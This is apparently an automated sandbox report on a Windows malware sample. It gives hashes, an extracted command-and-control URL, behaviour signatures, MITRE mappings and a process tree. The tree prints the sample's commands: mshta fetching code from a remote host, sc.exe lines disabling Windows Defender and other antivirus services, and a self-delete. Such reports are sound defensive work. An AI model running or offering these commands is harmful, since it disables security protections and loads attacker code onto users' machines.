Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
29-12-2023 18:38
General
-
Target
00b7eec8946cdf920a8153e8d3f4475e.exe
-
Size
2.2MB
-
MD5
00b7eec8946cdf920a8153e8d3f4475e
-
SHA1
9fa1c2d379aa9d21e6dfcdb55097b1eacfcb7b5f
-
SHA256
fe3caabf26e5ae965ad944b70b5ab0026aee8b338317f4e573c72c609988d277
-
SHA512
d0c249a811947d2bc129c38934f076edc821fa80fa3f6904812d550a24390e6e5d87d2156ae0dc183575e7a632af945bb64736d49d1821b1e6620f50c3aa9b9f
-
SSDEEP
49152:AtKOxSdaKij7cpXoI99JXy2x4SqHyY7dzXh0AWDQwGqJu:AFSUKijkX59JXSys0frGqw
Malware Config
Extracted
http://galaint.coolsecupdate.info/?0=115&1=1&2=1&3=41&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=qmjgqsrkie&14=1
Signatures
-
UAC bypass 3 TTPs 3 IoCs
-
Disables taskbar notifications via registry modification
-
Sets file execution options in registry 2 TTPs 64 IoCs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 7 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops file in System32 directory 3 IoCs
-
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SendNotifyMessage 4 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\00b7eec8946cdf920a8153e8d3f4475e.exe"C:\Users\Admin\AppData\Local\Temp\00b7eec8946cdf920a8153e8d3f4475e.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\269ek73z398g4fh.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\269ek73z398g4fh.exe" -e -pk22qa80s3so5mnb2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\3b5251xmf2ng2b8.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\3b5251xmf2ng2b8.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Protector-fico.exeC:\Users\Admin\AppData\Roaming\Protector-fico.exe4⤵
- UAC bypass
- Sets file execution options in registry
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.coolsecupdate.info/?0=115&1=1&2=1&3=41&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=qmjgqsrkie&14=1"5⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend5⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\3B5251~1.EXE" >> NUL4⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\269ek73z398g4fh.exeFilesize
2.1MB
MD552645efbc1f91d7f238da97b7de56d26
SHA1bcad319b994459b7c518d218042d19bd8d213d1c
SHA256416ed6e2cc128028e6fc402deaeeeda1a7979fbf3eb3d1a3e014c8381ab6dff9
SHA512f717e3899e8980d9f6217f121598a0e0b56e10b6f03984bfe67080c9f3c9d0125f34fe366148ec2559f110a30df5357cdaef5a0f994e8a2308327c601f21b50b
-
C:\Users\Admin\AppData\Roaming\Protector-fico.exeFilesize
1.2MB
MD52330c7233d8d1933d98d59a29d9b1e85
SHA1ba6055d2d598df3e15ce71cc334ac2017f764189
SHA256f1649085e7305793a35ae579d253226ad245c492d80b609fb725e5a2c21ce656
SHA512f989e90fd78f317f32bcc7b110035f8fea95a62d4e13244c8e0ae331c675f17f9537ee90da8e3b46986fa4a8932a609de9a3bd0b096b42a47001c869ae7ff113
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\RarSFX0\269ek73z398g4fh.exeFilesize
128KB
MD5886f5bcf8e66759c884a4a6f86997e8d
SHA1cd9488f2297ae99ee5cce18f4f180429e2caccf9
SHA256c91962f1d2915dc8a0bc268ad34f715bd71c047fb40a81ae5f71c8d29a3a7251
SHA5121d2e656f232384010cea05944a2199ffb38946cf7f2e4325cd35aa12c464601d8dfcd45616435b41ef84568cafcc0e6f82ecc2f7d9413917164bbb467a7e6246
-
\Users\Admin\AppData\Local\Temp\RarSFX1\3b5251xmf2ng2b8.exeFilesize
2.0MB
MD5db186145ea00cb748e66f0a6d8e58a16
SHA12d702d5927409083400251449109fef68d49abde
SHA256950defc4ec5ff5bccd695a3fe101be04c190df70ca91a49c3415836853f80242
SHA512b2aa3c2044cf375bfbabfafa66daf706cf97f6006528f8dac53096fadf93feaa03ee168c7871bc592ff365617412c6ee653ed362a8c4aa8b57a117dc5f3d47fe
-
memory/2088-21-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2088-39-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2088-22-0x0000000000C30000-0x0000000000C8A000-memory.dmpFilesize
360KB
-
memory/2088-26-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/2088-27-0x0000000000BE0000-0x0000000000BE1000-memory.dmpFilesize
4KB
-
memory/2088-25-0x00000000001D0000-0x00000000001D1000-memory.dmpFilesize
4KB
-
memory/2088-24-0x0000000003420000-0x0000000003423000-memory.dmpFilesize
12KB
-
memory/2088-23-0x0000000003430000-0x0000000003432000-memory.dmpFilesize
8KB
-
memory/2088-19-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2088-41-0x0000000000C30000-0x0000000000C8A000-memory.dmpFilesize
360KB
-
memory/2168-52-0x0000000004240000-0x0000000004250000-memory.dmpFilesize
64KB
-
memory/2168-76-0x0000000000370000-0x0000000000371000-memory.dmpFilesize
4KB
-
memory/2168-37-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-40-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-42-0x0000000000370000-0x0000000000371000-memory.dmpFilesize
4KB
-
memory/2168-91-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-90-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-89-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-50-0x0000000004240000-0x0000000004250000-memory.dmpFilesize
64KB
-
memory/2168-88-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-69-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-70-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-71-0x00000000002C0000-0x000000000031A000-memory.dmpFilesize
360KB
-
memory/2168-74-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-75-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-38-0x00000000002C0000-0x000000000031A000-memory.dmpFilesize
360KB
-
memory/2168-77-0x0000000004240000-0x0000000004250000-memory.dmpFilesize
64KB
-
memory/2168-78-0x0000000004240000-0x0000000004250000-memory.dmpFilesize
64KB
-
memory/2168-79-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-81-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-82-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-83-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-84-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-85-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-86-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2168-87-0x0000000000400000-0x0000000000831000-memory.dmpFilesize
4.2MB
-
memory/2284-53-0x0000000003210000-0x0000000003641000-memory.dmpFilesize
4.2MB
-
memory/2284-20-0x0000000003210000-0x0000000003641000-memory.dmpFilesize
4.2MB
-
memory/2284-49-0x0000000003210000-0x000000000326D000-memory.dmpFilesize
372KB
-
memory/2284-18-0x0000000003210000-0x0000000003641000-memory.dmpFilesize
4.2MB